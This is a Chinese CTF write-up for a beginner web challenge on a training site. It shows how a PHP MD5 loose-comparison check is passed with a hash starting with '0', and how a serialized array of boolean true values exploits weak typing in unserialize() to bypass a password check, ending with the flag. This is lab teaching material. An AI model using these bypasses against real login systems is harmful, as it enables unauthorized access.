CTF最简单的Web题

点点圈 提交于 2020-11-21 04:29:11
http://www.shiyanbar.com/ctf/1810

天网管理系统
天网你敢来挑战嘛
格式:ctf{ }
解题链接: http://ctf5.shiyanbar.com/10/web1

查看源代码发现提示<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->

md5($test) = ‘0’ 

百度0开头的md5值,随便拿一个带进username用就OK了。 

得到一个提示:

/user.php?fame=hjkleffifer

 进入  http://ctf5.shiyanbar.com/10/web1/user.php?fame=hjkleffifer

$unserialize_str = $_POST['password']; 
$data_unserialize = unserialize($unserialize_str); 
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') 
{ print_r($flag); } 
伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年
把复杂的数据类型压缩到一个字符串中
serialize() 把变量和它们的值编码成文本形式
unserialize() 恢复原先变量
 弱类型,bool的true和任意字符串弱类型相等, 所以构造的user(bool)和password(bool)的值为true即可。
<?php
$payload = array('user'=>true,'pass' => true);
echo serialize($payload);
?>

  得到

a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

 user:admin

password: a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

 得到

ctf{dwduwkhduw5465}

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!